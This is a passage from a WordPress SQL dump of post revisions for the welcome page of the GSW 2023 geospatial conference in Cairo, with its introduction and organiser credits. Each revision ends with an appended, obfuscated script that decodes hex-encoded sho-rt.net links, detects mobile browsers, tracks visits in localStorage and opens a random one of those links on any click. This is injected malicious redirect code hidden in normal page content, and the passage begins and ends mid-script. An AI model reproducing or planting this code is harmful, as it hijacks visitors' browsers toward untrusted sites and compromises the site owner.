_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 10:26:41','2023-06-03 10:26:41','',3233,'https://gsw2023.com/?p=4617',0,'revision','',0),
(4618,1,'2023-06-03 11:00:16','2023-06-03 11:00:16','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685787895915{margin-top: -200px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2270\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png\" alt=\"\" width=\"118\" height=\"117\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-4613 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"94\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-2272 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p>&nbsp;</p>\n</section>\n</div>\n</div>\n</div>\n</div>\n</div>\n<footer id=\"footer\" class=\"footer solid-bg footer-outline-decoration full-width empty-footer\">\n<div id=\"bottom-bar\" class=\"solid-bg logo-left\" role=\"contentinfo\">\n<div class=\"wf-wrap\">\n<div class=\"wf-container-bottom\"></div>\n</div>\n</div>\n</footer>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 11:00:16','2023-06-03 11:00:16','',3233,'https://gsw2023.com/?p=4618',0,'revision','',0),
(4619,1,'2023-06-03 11:01:13','2023-06-03 11:01:13','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685790017893{margin-top: -100px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2270\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png\" alt=\"\" width=\"118\" height=\"117\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-4613 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"94\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-2272 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p>&nbsp;</p>\n</section>\n</div>\n</div>\n</div>\n</div>\n</div>\n<footer id=\"footer\" class=\"footer solid-bg footer-outline-decoration full-width empty-footer\">\n<div id=\"bottom-bar\" class=\"solid-bg logo-left\" role=\"contentinfo\">\n<div class=\"wf-wrap\">\n<div class=\"wf-container-bottom\"></div>\n</div>\n</div>\n</footer>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'f